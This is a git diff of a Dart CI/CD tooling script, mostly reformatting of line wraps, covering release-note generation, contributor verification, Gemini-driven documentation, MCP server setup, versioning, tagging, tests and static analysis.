+ '${config.repoOwner}/${config.repoName}', repoRoot: repoRoot, ); _success('Post-processed release notes: ${content.length} chars'); @@ -920,7 +983,9 @@ Future _runReleaseNotes(String repoRoot) async { if (migrationFile.existsSync()) { _success('Migration guide: ${migrationFile.lengthSync()} bytes'); - File('/tmp/migration_guide.md').writeAsStringSync(migrationFile.readAsStringSync()); + File( + '/tmp/migration_guide.md', + ).writeAsStringSync(migrationFile.readAsStringSync()); } else if (bumpType == 'major') { _warn('Major release but no migration guide generated'); } @@ -934,10 +999,18 @@ Future _runReleaseNotes(String repoRoot) async { } // Build rich step summary - final rnContent = releaseNotesFile.existsSync() ? releaseNotesFile.readAsStringSync() : '(not generated)'; - final migContent = migrationFile.existsSync() ? migrationFile.readAsStringSync() : ''; - final linkedContent = linkedIssuesFile.existsSync() ? linkedIssuesFile.readAsStringSync() : ''; - final hlContent = highlightsFile.existsSync() ? highlightsFile.readAsStringSync() : ''; + final rnContent = releaseNotesFile.existsSync() + ? releaseNotesFile.readAsStringSync() + : '(not generated)'; + final migContent = migrationFile.existsSync() + ? migrationFile.readAsStringSync() + : ''; + final linkedContent = linkedIssuesFile.existsSync() + ? linkedIssuesFile.readAsStringSync() + : ''; + final hlContent = highlightsFile.existsSync() + ? highlightsFile.readAsStringSync() + : ''; _writeStepSummary(''' ## Stage 3: Release Notes Author Complete @@ -971,8 +1044,13 @@ ${_artifactLink()} /// 1. Only contributors who actually committed in THIS release are listed /// 2. GitHub usernames are verified (not guessed from display names) /// 3. Bots are excluded -List> _gatherVerifiedContributors(String repoRoot, String prevTag) { - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? 
'${config.repoOwner}/${config.repoName}'; +List> _gatherVerifiedContributors( + String repoRoot, + String prevTag, +) { + final repo = + Platform.environment['GITHUB_REPOSITORY'] ?? + '${config.repoOwner}/${config.repoName}'; // Step 1: Get one commit SHA per unique author email in the release range final gitResult = Process.runSync('sh', [ @@ -985,7 +1063,10 @@ List> _gatherVerifiedContributors(String repoRoot, String pr return []; } - final lines = (gitResult.stdout as String).trim().split('\n').where((l) => l.isNotEmpty); + final lines = (gitResult.stdout as String) + .trim() + .split('\n') + .where((l) => l.isNotEmpty); final contributors = >[]; final seenLogins = {}; @@ -996,7 +1077,9 @@ List> _gatherVerifiedContributors(String repoRoot, String pr final email = parts[1]; // Skip bot emails - if (email.contains('[bot]') || email.contains('noreply.github.com') && email.contains('bot')) continue; + if (email.contains('[bot]') || + email.contains('noreply.github.com') && email.contains('bot')) + continue; // Step 2: Resolve SHA to verified GitHub login via commits API try { @@ -1009,7 +1092,9 @@ List> _gatherVerifiedContributors(String repoRoot, String pr if (ghResult.exitCode == 0) { final login = (ghResult.stdout as String).trim(); - if (login.isNotEmpty && !login.contains('[bot]') && !seenLogins.contains(login)) { + if (login.isNotEmpty && + !login.contains('[bot]') && + !seenLogins.contains(login)) { seenLogins.add(login); contributors.add({'username': login}); } @@ -1020,7 +1105,9 @@ List> _gatherVerifiedContributors(String repoRoot, String pr } if (contributors.isEmpty) { - _warn('No contributors resolved from GitHub API, falling back to git names'); + _warn( + 'No contributors resolved from GitHub API, falling back to git names', + ); // Fallback: use git display names without usernames final names = (gitResult.stdout as String) .trim() @@ -1028,7 +1115,9 @@ List> _gatherVerifiedContributors(String repoRoot, String pr .where((l) => l.isNotEmpty && 
!l.contains('[bot]')) .map((l) => l.split(' ').length > 1 ? l.split(' ')[1] : l) .toSet() - .map>((email) => {'username': email.split('@').first}) + .map>( + (email) => {'username': email.split('@').first}, + ) .toList(); return names; } @@ -1056,7 +1145,9 @@ String _postProcessReleaseNotes( contributorsSection.writeln('## Contributors'); contributorsSection.writeln(); if (verifiedContributors.isNotEmpty) { - contributorsSection.writeln('Thanks to everyone who contributed to this release:'); + contributorsSection.writeln( + 'Thanks to everyone who contributed to this release:', + ); for (final c in verifiedContributors) { final username = c['username'] ?? ''; if (username.isNotEmpty) { @@ -1097,16 +1188,25 @@ String _postProcessReleaseNotes( // ── Validate issue references throughout the document ── // Find all (#N) patterns and validate they exist - final issueRefs = RegExp(r'\(#(\d+)\)').allMatches(result).map((m) => int.parse(m.group(1)!)).toSet(); + final issueRefs = RegExp( + r'\(#(\d+)\)', + ).allMatches(result).map((m) => int.parse(m.group(1)!)).toSet(); if (issueRefs.isNotEmpty) { - final validIssues = verifiedIssues.map((i) => i['number'] as int? ?? 0).toSet(); + final validIssues = verifiedIssues + .map((i) => i['number'] as int? ?? 
0) + .toSet(); final fabricated = issueRefs.difference(validIssues); if (fabricated.isNotEmpty) { - _warn('Stripping ${fabricated.length} fabricated issue references: ${fabricated.map((n) => "#$n").join(", ")}'); + _warn( + 'Stripping ${fabricated.length} fabricated issue references: ${fabricated.map((n) => "#$n").join(", ")}', + ); for (final issueNum in fabricated) { // Remove the link but keep descriptive text: "[#N](url) — desc" → "desc" - result = result.replaceAll(RegExp(r'- \[#' + issueNum.toString() + r'\]\([^)]*\)[^\n]*\n'), ''); + result = result.replaceAll( + RegExp(r'- \[#' + issueNum.toString() + r'\]\([^)]*\)[^\n]*\n'), + '', + ); // Remove inline (#N) references result = result.replaceAll('(#$issueNum)', ''); } @@ -1116,7 +1216,11 @@ String _postProcessReleaseNotes( return result; } -String _buildFallbackReleaseNotes(String repoRoot, String version, String prevTag) { +String _buildFallbackReleaseNotes( + String repoRoot, + String version, + String prevTag, +) { final buf = StringBuffer(); buf.writeln('# ${config.repoName} v$version'); buf.writeln(); @@ -1192,7 +1296,9 @@ Future _runAutodoc(String repoRoot, List args) async { if (File(configPath).existsSync()) { _success('autodoc.json exists at $configPath'); } else { - _error('autodoc.json not found. Create it at $kRuntimeCiDir/autodoc.json'); + _error( + 'autodoc.json not found. Create it at $kRuntimeCiDir/autodoc.json', + ); } return; } @@ -1240,7 +1346,9 @@ Future _runAutodoc(String repoRoot, List args) async { final generateTypes = (module['generate'] as List).cast(); final libDir = libPaths.isNotEmpty ? '$repoRoot/${libPaths.first}' : ''; - _info(' $id ($name): ${force ? "forced" : "changed"} -> generating ${generateTypes.join(", ")}'); + _info( + ' $id ($name): ${force ? 
"forced" : "changed"} -> generating ${generateTypes.join(", ")}', + ); if (dryRun) { updatedModules.add(id); @@ -1282,7 +1390,9 @@ Future _runAutodoc(String repoRoot, List args) async { if (dryRun) { _info(''); - _info('[DRY-RUN] Would generate docs for ${updatedModules.length} modules, skipped $skippedCount unchanged'); + _info( + '[DRY-RUN] Would generate docs for ${updatedModules.length} modules, skipped $skippedCount unchanged', + ); for (final id in updatedModules) { _info(' - $id'); } @@ -1296,7 +1406,9 @@ Future _runAutodoc(String repoRoot, List args) async { // Execute in parallel batches _info(''); - _info('Running ${tasks.length} Gemini doc generation tasks (max $maxConcurrent parallel)...'); + _info( + 'Running ${tasks.length} Gemini doc generation tasks (max $maxConcurrent parallel)...', + ); // Simple batching: process maxConcurrent at a time for (var i = 0; i < tasks.length; i += maxConcurrent) { @@ -1305,9 +1417,13 @@ Future _runAutodoc(String repoRoot, List args) async { } // Save updated config with new hashes - File(configPath).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(config)); + File( + configPath, + ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(config)); - _success('Generated docs for ${updatedModules.length} modules, skipped $skippedCount unchanged.'); + _success( + 'Generated docs for ${updatedModules.length} modules, skipped $skippedCount unchanged.', + ); _info('Updated hashes saved to $kRuntimeCiDir/autodoc.json'); _writeStepSummary(''' @@ -1356,9 +1472,13 @@ Future _generateAutodocFile({ // Generate prompt from template final promptArgs = [moduleName, sourceDir]; if (libDir.isNotEmpty) promptArgs.add(libDir); - if (docType == 'migration' && previousHash.isNotEmpty) promptArgs.add(previousHash); + if (docType == 'migration' && previousHash.isNotEmpty) + promptArgs.add(previousHash); - final prompt = _runSync('dart run $repoRoot/$templatePath ${promptArgs.map((a) => '"$a"').join(' ')}', repoRoot); + final 
prompt = _runSync( + 'dart run $repoRoot/$templatePath ${promptArgs.map((a) => '"$a"').join(' ')}', + repoRoot, + ); if (prompt.isEmpty) { _warn(' [$moduleId] Empty prompt for $docType, skipping'); @@ -1399,7 +1519,10 @@ Do not skip any -- completeness is more important than brevity. final pass1Result = Process.runSync( 'sh', - ['-c', 'cat ${pass1Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], + [ + '-c', + 'cat ${pass1Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}', + ], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1407,7 +1530,9 @@ Do not skip any -- completeness is more important than brevity. if (pass1Prompt.existsSync()) pass1Prompt.deleteSync(); if (pass1Result.exitCode != 0) { - _warn(' [$moduleId] Pass 1 failed: ${(pass1Result.stderr as String).trim()}'); + _warn( + ' [$moduleId] Pass 1 failed: ${(pass1Result.stderr as String).trim()}', + ); return; } @@ -1488,7 +1613,10 @@ Write the corrected file to the same path: $absOutputFile final pass2Result = Process.runSync( 'sh', - ['-c', 'cat ${pass2Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], + [ + '-c', + 'cat ${pass2Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}', + ], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1496,7 +1624,9 @@ Write the corrected file to the same path: $absOutputFile if (pass2Prompt.existsSync()) pass2Prompt.deleteSync(); if (pass2Result.exitCode != 0) { - _warn(' [$moduleId] Pass 2 failed (keeping Pass 1 output): ${(pass2Result.stderr as String).trim()}'); + _warn( + ' [$moduleId] Pass 2 failed (keeping Pass 1 output): ${(pass2Result.stderr as String).trim()}', + ); } // Verify final output @@ -1504,7 +1634,9 @@ Write the corrected file to the same path: $absOutputFile final finalSize = outputFile.lengthSync(); final delta = finalSize - pass1Size; final deltaStr = delta >= 0 ? 
'+$delta' : '$delta'; - _success(' [$moduleId] $outputFileName: $finalSize bytes ($deltaStr from review)'); + _success( + ' [$moduleId] $outputFileName: $finalSize bytes ($deltaStr from review)', + ); return; } @@ -1550,7 +1682,9 @@ Future _runTriageCli(String repoRoot, List triageArgs) async { if (_dryRun) forwardedArgs.add('--dry-run'); if (_verbose) forwardedArgs.add('--verbose'); - _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${forwardedArgs.join(" ")}'); + _info( + 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${forwardedArgs.join(" ")}', + ); final result = await Process.run( 'dart', @@ -1597,20 +1731,27 @@ Future _runVersion(String repoRoot) async { final prevTag = _prevTagOverride ?? _detectPrevTag(repoRoot); final newVersion = _versionOverride ?? _detectNextVersion(repoRoot, prevTag); - final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); + final currentVersion = _runSync( + "awk '/^version:/{print \$2}' pubspec.yaml", + repoRoot, + ); _info('Current version (pubspec.yaml): $currentVersion'); _info('Previous tag: $prevTag'); _info('Next version: $newVersion'); // Save version bump rationale if Gemini produced one - final rationaleFile = File('$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md'); + final rationaleFile = File( + '$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md', + ); if (rationaleFile.existsSync()) { final bumpDir = Directory('$repoRoot/$kVersionBumpsDir'); bumpDir.createSync(recursive: true); final targetPath = '${bumpDir.path}/v$newVersion.md'; rationaleFile.copySync(targetPath); - _success('Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md'); + _success( + 'Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md', + ); } } @@ -1623,7 +1764,8 @@ Future _runConfigureMcp(String repoRoot) async { Map settings; try { - settings = json.decode(settingsFile.readAsStringSync()) as Map; + settings = + 
json.decode(settingsFile.readAsStringSync()) as Map; } catch (e) { _error('Could not read .gemini/settings.json: $e'); exit(1); @@ -1634,13 +1776,22 @@ Future _runConfigureMcp(String repoRoot) async { // GitHub MCP Server final ghToken = - Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN'] ?? Platform.environment['GITHUB_PAT']; + Platform.environment['GH_TOKEN'] ?? + Platform.environment['GITHUB_TOKEN'] ?? + Platform.environment['GITHUB_PAT']; if (ghToken != null && ghToken.isNotEmpty) { _info('Configuring GitHub MCP server...'); mcpServers['github'] = { 'command': 'docker', - 'args': ['run', '-i', '--rm', '-e', 'GITHUB_PERSONAL_ACCESS_TOKEN', 'ghcr.io/github/github-mcp-server'], + 'args': [ + 'run', + '-i', + '--rm', + '-e', + 'GITHUB_PERSONAL_ACCESS_TOKEN', + 'ghcr.io/github/github-mcp-server', + ], 'env': {'GITHUB_PERSONAL_ACCESS_TOKEN': ghToken}, 'includeTools': [ 'get_issue', @@ -1671,14 +1822,18 @@ Future _runConfigureMcp(String repoRoot) async { }; _success('GitHub MCP server configured'); } else { - _warn('No GitHub token found. Set GH_TOKEN or GITHUB_PAT to configure GitHub MCP.'); + _warn( + 'No GitHub token found. 
Set GH_TOKEN or GITHUB_PAT to configure GitHub MCP.', + ); _info(' export GH_TOKEN='); } // Sentry MCP Server (remote, no local install needed) _info('Configuring Sentry MCP server (remote)...'); mcpServers['sentry'] = {'url': 'https://mcp.sentry.dev/mcp'}; - _success('Sentry MCP server configured (uses OAuth -- browser auth on first use)'); + _success( + 'Sentry MCP server configured (uses OAuth -- browser auth on first use)', + ); // Write updated settings settings['mcpServers'] = mcpServers; @@ -1689,7 +1844,9 @@ Future _runConfigureMcp(String repoRoot) async { return; } - settingsFile.writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(settings)}\n'); + settingsFile.writeAsStringSync( + '${const JsonEncoder.withIndent(' ').convert(settings)}\n', + ); _success('Updated .gemini/settings.json with MCP servers'); _info(''); @@ -1718,7 +1875,10 @@ Future _runStatus(String repoRoot) async { _info('Required tools:'); for (final tool in [...kRequiredTools, ...kOptionalTools]) { if (_commandExists(tool)) { - final version = _runSync('$tool --version 2>/dev/null || echo "installed"', repoRoot); + final version = _runSync( + '$tool --version 2>/dev/null || echo "installed"', + repoRoot, + ); _success(' $tool: $version'); } else { _error(' $tool: NOT INSTALLED'); @@ -1729,22 +1889,29 @@ Future _runStatus(String repoRoot) async { _info(''); _info('Environment:'); final geminiKey = Platform.environment['GEMINI_API_KEY']; - _info(' GEMINI_API_KEY: ${geminiKey != null ? "set (${geminiKey.length} chars)" : "NOT SET"}'); - final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; + _info( + ' GEMINI_API_KEY: ${geminiKey != null ? "set (${geminiKey.length} chars)" : "NOT SET"}', + ); + final ghToken = + Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; _info(' GitHub token: ${ghToken != null ? 
"set" : "NOT SET"}'); // Check MCP servers _info(''); _info('MCP servers:'); try { - final settings = json.decode(File('$repoRoot/.gemini/settings.json').readAsStringSync()); + final settings = json.decode( + File('$repoRoot/.gemini/settings.json').readAsStringSync(), + ); final mcpServers = settings['mcpServers'] as Map?; if (mcpServers != null && mcpServers.isNotEmpty) { for (final server in mcpServers.keys) { _success(' $server: configured'); } } else { - _info(' No MCP servers configured. Run: dart run runtime_ci_tooling:manage_cicd configure-mcp'); + _info( + ' No MCP servers configured. Run: dart run runtime_ci_tooling:manage_cicd configure-mcp', + ); } } catch (_) { _info(' Could not read MCP configuration'); @@ -1764,7 +1931,10 @@ Future _runStatus(String repoRoot) async { // Show version info _info(''); - final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); + final currentVersion = _runSync( + "awk '/^version:/{print \$2}' pubspec.yaml", + repoRoot, + ); final prevTag = _detectPrevTag(repoRoot); _info('Package version: $currentVersion'); _info('Latest tag: $prevTag'); @@ -1785,14 +1955,20 @@ Future _runDetermineVersion(String repoRoot, List args) async { final prevTag = _prevTagOverride ?? _detectPrevTag(repoRoot); final newVersion = _versionOverride ?? _detectNextVersion(repoRoot, prevTag); - final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); + final currentVersion = _runSync( + "awk '/^version:/{print \$2}' pubspec.yaml", + repoRoot, + ); // Determine if we should release var shouldRelease = newVersion != currentVersion; // Safety net: if the tag already exists, skip release regardless if (shouldRelease) { - final tagCheck = Process.runSync('git', ['rev-parse', 'v$newVersion'], workingDirectory: repoRoot); + final tagCheck = Process.runSync('git', [ + 'rev-parse', + 'v$newVersion', + ], workingDirectory: repoRoot); if (tagCheck.exitCode == 0) { _warn('Tag v$newVersion already exists. 
Skipping release.'); shouldRelease = false; @@ -1806,18 +1982,28 @@ Future _runDetermineVersion(String repoRoot, List args) async { // Save version bump rationale if Gemini produced one if (shouldRelease) { - final rationaleFile = File('$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md'); + final rationaleFile = File( + '$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md', + ); final bumpDir = Directory('$repoRoot/$kVersionBumpsDir'); bumpDir.createSync(recursive: true); final targetPath = '${bumpDir.path}/v$newVersion.md'; if (rationaleFile.existsSync()) { rationaleFile.copySync(targetPath); - _success('Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md'); + _success( + 'Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md', + ); } else { // Generate basic rationale - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); - final commits = _runSync('git log "$prevTag"..HEAD --oneline --no-merges 2>/dev/null | head -20', repoRoot); + final commitCount = _runSync( + 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', + repoRoot, + ); + final commits = _runSync( + 'git log "$prevTag"..HEAD --oneline --no-merges 2>/dev/null | head -20', + repoRoot, + ); File(targetPath).writeAsStringSync( '# Version Bump: v$newVersion\n\n' '**Date**: ${DateTime.now().toUtc().toIso8601String()}\n' @@ -1825,7 +2011,9 @@ Future _runDetermineVersion(String repoRoot, List args) async { '**Commits**: $commitCount\n\n' '## Commits\n\n$commits\n', ); - _success('Basic version rationale saved to $kVersionBumpsDir/v$newVersion.md'); + _success( + 'Basic version rationale saved to $kVersionBumpsDir/v$newVersion.md', + ); } } @@ -1868,7 +2056,9 @@ Future _runDetermineVersion(String repoRoot, List args) async { } // Read version bump rationale for summary - final rationaleContent = _readFileOr('$repoRoot/$kVersionBumpsDir/v$newVersion.md'); + final rationaleContent = _readFileOr( + 
'$repoRoot/$kVersionBumpsDir/v$newVersion.md', + ); _writeStepSummary(''' ## Version Determination @@ -1927,7 +2117,10 @@ Future _runCreateRelease(String repoRoot, List args) async { final pubspecFile = File('$repoRoot/pubspec.yaml'); final pubspecContent = pubspecFile.readAsStringSync(); pubspecFile.writeAsStringSync( - pubspecContent.replaceFirst(RegExp(r'^version: .*', multiLine: true), 'version: $newVersion'), + pubspecContent.replaceFirst( + RegExp(r'^version: .*', multiLine: true), + 'version: $newVersion', + ), ); _info('Bumped pubspec.yaml to version $newVersion'); @@ -1954,13 +2147,14 @@ Future _runCreateRelease(String repoRoot, List args) async { } } - if (foundReleaseNotes != null && foundReleaseNotes.path != '${releaseDir.path}/release_notes.md') { + if (foundReleaseNotes != null && + foundReleaseNotes.path != '${releaseDir.path}/release_notes.md') { foundReleaseNotes.copySync('${releaseDir.path}/release_notes.md'); _info('Copied release notes to ${releaseDir.path}/release_notes.md'); } else if (foundReleaseNotes == null) { - File( - '${releaseDir.path}/release_notes.md', - ).writeAsStringSync(_buildFallbackReleaseNotes(repoRoot, newVersion, prevTag)); + File('${releaseDir.path}/release_notes.md').writeAsStringSync( + _buildFallbackReleaseNotes(repoRoot, newVersion, prevTag), + ); _warn('No Stage 3 release notes found -- generated fallback'); } @@ -1984,9 +2178,9 @@ Future _runCreateRelease(String repoRoot, List args) async { // Copy Stage 3 linked issues if it exists, otherwise create minimal final existingLinked = File('${releaseDir.path}/linked_issues.json'); if (!existingLinked.existsSync()) { - File( - '${releaseDir.path}/linked_issues.json', - ).writeAsStringSync('{"version":"$newVersion","github_issues":[],"sentry_issues":[],"prs_referenced":[]}'); + File('${releaseDir.path}/linked_issues.json').writeAsStringSync( + '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"prs_referenced":[]}', + ); } // Copy Stage 3 highlights if it 
exists @@ -1999,7 +2193,10 @@ Future _runCreateRelease(String repoRoot, List args) async { final changelog = File('$repoRoot/CHANGELOG.md'); if (changelog.existsSync()) { final content = changelog.readAsStringSync(); - final entryMatch = RegExp('## \\[$newVersion\\].*?(?=## \\[|\\Z)', dotAll: true).firstMatch(content); + final entryMatch = RegExp( + '## \\[$newVersion\\].*?(?=## \\[|\\Z)', + dotAll: true, + ).firstMatch(content); File( '${releaseDir.path}/changelog_entry.md', ).writeAsStringSync(entryMatch?.group(0)?.trim() ?? '## [$newVersion]\n'); @@ -2007,7 +2204,9 @@ Future _runCreateRelease(String repoRoot, List args) async { // Contributors: use the single verified source of truth final contribs = _gatherVerifiedContributors(repoRoot, prevTag); - File('${releaseDir.path}/contributors.json').writeAsStringSync(const JsonEncoder.withIndent(' ').convert(contribs)); + File( + '${releaseDir.path}/contributors.json', + ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(contribs)); _success('Release notes assembled in $kReleaseNotesDir/v$newVersion/'); @@ -2019,7 +2218,11 @@ Future _runCreateRelease(String repoRoot, List args) async { // Step 4: Commit all changes _info('Configuring git identity for release commit'); _exec('git', ['config', 'user.name', 'github-actions[bot]'], cwd: repoRoot); - _exec('git', ['config', 'user.email', 'github-actions[bot]@users.noreply.github.com'], cwd: repoRoot); + _exec('git', [ + 'config', + 'user.email', + 'github-actions[bot]@users.noreply.github.com', + ], cwd: repoRoot); // Add files individually — git add is all-or-nothing and will fail the // entire command if any path doesn't exist (e.g., autodoc.json on first @@ -2034,7 +2237,8 @@ Future _runCreateRelease(String repoRoot, List args) async { '$kRuntimeCiDir/autodoc.json', ]; if (Directory('$repoRoot/docs').existsSync()) filesToAdd.add('docs/'); - if (Directory('$repoRoot/$kCicdAuditDir').existsSync()) filesToAdd.add('$kCicdAuditDir/'); + if 
(Directory('$repoRoot/$kCicdAuditDir').existsSync()) + filesToAdd.add('$kCicdAuditDir/'); _info('Staging ${filesToAdd.length} release artifacts for commit'); for (final path in filesToAdd) { final fullPath = '$repoRoot/$path'; @@ -2043,7 +2247,11 @@ Future _runCreateRelease(String repoRoot, List args) async { } } - final diffResult = Process.runSync('git', ['diff', '--cached', '--quiet'], workingDirectory: repoRoot); + final diffResult = Process.runSync('git', [ + 'diff', + '--cached', + '--quiet', + ], workingDirectory: repoRoot); if (diffResult.exitCode != 0) { // Build a rich, detailed commit message from available artifacts final commitMsg = _buildReleaseCommitMessage( @@ -2055,12 +2263,20 @@ Future _runCreateRelease(String repoRoot, List args) async { // Use a temp file for the commit message to avoid shell escaping issues final commitMsgFile = File('$repoRoot/.git/RELEASE_COMMIT_MSG'); commitMsgFile.writeAsStringSync(commitMsg); - _exec('git', ['commit', '-F', commitMsgFile.path], cwd: repoRoot, fatal: true); + _exec( + 'git', + ['commit', '-F', commitMsgFile.path], + cwd: repoRoot, + fatal: true, + ); commitMsgFile.deleteSync(); // Use GH_TOKEN for push authentication (HTTPS remote) - final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; - final remoteRepo = Platform.environment['GITHUB_REPOSITORY'] ?? effectiveRepo; + final ghToken = + Platform.environment['GH_TOKEN'] ?? + Platform.environment['GITHUB_TOKEN']; + final remoteRepo = + Platform.environment['GITHUB_REPOSITORY'] ?? 
effectiveRepo; if (ghToken != null && remoteRepo.isNotEmpty) { _exec('git', [ 'remote', @@ -2076,12 +2292,20 @@ Future _runCreateRelease(String repoRoot, List args) async { } // Step 5: Create git tag (verify it doesn't already exist) - final tagCheck = Process.runSync('git', ['rev-parse', tag], workingDirectory: repoRoot); + final tagCheck = Process.runSync('git', [ + 'rev-parse', + tag, + ], workingDirectory: repoRoot); if (tagCheck.exitCode == 0) { _error('Tag $tag already exists. Cannot create release.'); exit(1); } - _exec('git', ['tag', '-a', tag, '-m', 'Release v$newVersion'], cwd: repoRoot, fatal: true); + _exec( + 'git', + ['tag', '-a', tag, '-m', 'Release v$newVersion'], + cwd: repoRoot, + fatal: true, + ); _exec('git', ['push', 'origin', tag], cwd: repoRoot, fatal: true); _success('Created tag: $tag'); @@ -2098,14 +2322,23 @@ Future _runCreateRelease(String repoRoot, List args) async { final changelogLink = File('$repoRoot/CHANGELOG.md').existsSync() ? ' | [CHANGELOG.md](https://github.com/$effectiveRepo/blob/v$newVersion/CHANGELOG.md)' : ''; - final migrationLink = File('${releaseDir.path}/migration_guide.md').existsSync() + final migrationLink = + File('${releaseDir.path}/migration_guide.md').existsSync() ? 
' | [Migration Guide]($kReleaseNotesDir/v$newVersion/migration_guide.md)' : ''; releaseBody += '\n\n---\n[Full Changelog](https://github.com/$effectiveRepo/compare/$prevTag...v$newVersion)' '$changelogLink$migrationLink'; - final ghArgs = ['release', 'create', tag, '--title', 'v$newVersion', '--notes', releaseBody]; + final ghArgs = [ + 'release', + 'create', + tag, + '--title', + 'v$newVersion', + '--notes', + releaseBody, + ]; if (effectiveRepo.isNotEmpty) ghArgs.addAll(['--repo', effectiveRepo]); _exec('gh', ghArgs, cwd: repoRoot); @@ -2159,12 +2392,15 @@ Future _runTest(String repoRoot) async { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { _success('No test/ directory found — skipping tests'); - _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); + _writeStepSummary( + '## Test Results\n\n**No test/ directory found — skipped.**\n', + ); return; } // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; + final logDir = + Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; Directory(logDir).createSync(recursive: true); final jsonPath = '$logDir/results.json'; @@ -2189,7 +2425,11 @@ Future _runTest(String repoRoot) async { // Use Process.start with piped output so we can both stream to console // AND capture the full output for summary generation. 
- final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); + final process = await Process.start( + Platform.resolvedExecutable, + testArgs, + workingDirectory: repoRoot, + ); // Stream stdout and stderr to console in real-time while capturing final stdoutBuf = StringBuffer(); @@ -2210,19 +2450,24 @@ Future _runTest(String repoRoot) async { final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { - _error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + _error( + 'Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.', + ); process.kill(); // No signal arg — cross-platform safe return -1; }, ); try { - await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); + await Future.wait([ + stdoutDone, + stderrDone, + ]).timeout(const Duration(seconds: 30)); } catch (_) { // Ignore stream errors (e.g. process killed before streams drained) } // Parse the JSON results file for structured test data - final results = parseTestResultsJson(jsonPath); + final results = StepSummary.parseTestResultsJson(jsonPath); // Write console output to log file as well (supplements shell-level tee) File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); @@ -2231,7 +2476,7 @@ Future _runTest(String repoRoot) async { } // Generate and write the rich job summary - writeTestJobSummary(results, exitCode, logDir); + StepSummary.writeTestJobSummary(results, exitCode); if (exitCode != 0) { _error('Tests failed (exit code $exitCode)'); @@ -2247,15 +2492,26 @@ Future _runTest(String repoRoot) async { /// protobuf code, which are expected and must not block CI. 
Future _runAnalyze(String repoRoot) async { _header('Running Analysis'); - final result = await Process.run('dart', ['analyze'], workingDirectory: repoRoot); + final result = await Process.run('dart', [ + 'analyze', + ], workingDirectory: repoRoot); final output = (result.stdout as String); stdout.write(output); stderr.write(result.stderr); // Count severity levels in output - final errorCount = RegExp(r'^\s*error\s+-\s+', multiLine: true).allMatches(output).length; - final warningCount = RegExp(r'^\s*warning\s+-\s+', multiLine: true).allMatches(output).length; - final infoCount = RegExp(r'^\s*info\s+-\s+', multiLine: true).allMatches(output).length; + final errorCount = RegExp( + r'^\s*error\s+-\s+', + multiLine: true, + ).allMatches(output).length; + final warningCount = RegExp( + r'^\s*warning\s+-\s+', + multiLine: true, + ).allMatches(output).length; + final infoCount = RegExp( + r'^\s*info\s+-\s+', + multiLine: true, + ).allMatches(output).length; _info(' Errors: $errorCount, Warnings: $warningCount, Infos: $infoCount'); @@ -2316,7 +2572,11 @@ Future _runVerifyProtos(String repoRoot) async { final protoDir = Directory('$repoRoot/proto/src'); var protoCount = 0; if (protoDir.existsSync()) { - protoCount = protoDir.listSync(recursive: true).whereType().where((f) => f.path.endsWith('.proto')).length; + protoCount = protoDir + .listSync(recursive: true) + .whereType() + .where((f) => f.path.endsWith('.proto')) + .length; } _info('Proto source files in proto/src/: $protoCount'); @@ -2329,7 +2589,12 @@ Future _runVerifyProtos(String repoRoot) async { final libDir = Directory('$repoRoot/lib'); var generatedCount = 0; if (libDir.existsSync()) { - final extensions = ['.pb.dart', '.pbenum.dart', '.pbjson.dart', '.pbgrpc.dart']; + final extensions = [ + '.pb.dart', + '.pbenum.dart', + '.pbjson.dart', + '.pbgrpc.dart', + ]; generatedCount = libDir .listSync(recursive: true) .whereType() @@ -2343,7 +2608,9 @@ Future _runVerifyProtos(String repoRoot) async { exit(1); } - 
